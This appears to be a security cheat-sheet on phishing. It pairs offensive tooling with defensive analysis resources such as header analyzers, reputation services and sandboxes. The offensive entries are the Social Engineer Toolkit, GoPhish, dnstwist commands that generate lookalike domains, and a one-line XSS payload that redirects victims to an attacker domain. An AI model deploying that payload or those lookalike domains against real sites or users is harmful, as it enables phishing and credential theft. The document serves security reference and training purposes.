Phishing

Social Engineer Toolkit (SET):

Social Engineer Toolkit (SET)

From XSS To SET Portal: <script>window.location.replace("http://<attacker Domain>")</script>

Generate Similar Domains

dnstwist <domain> > similarDomains.txt
grep -iv "homoglyph" similarDomains.txt > Domains.txt

GoPhish

Phishing campaigns made easy:

• https://getgophish.com/

Analysis

Message Headers

• Google Email Header Analysis

• Message Header Analyzer

• MailHeader.org

IP/Web Reputation:

• ipinfo.io

• https://urlscan.io/

• https://talosintelligence.com/reputation

• URL2PNG

• Wannabrowser

URL Info:

• https://www.convertcsv.com/url-extractor.htm

• https://phishtank.com/?

Attachments (Hashes):

• https://www.virustotal.com/gui/

• https://talosintelligence.com/talos_file_reputation

Sandboxes:

• https://app.any.run/

• https://www.hybrid-analysis.com/

• https://www.joesecurity.org/

• PhishTool

MX:

• https://mxtoolbox.com/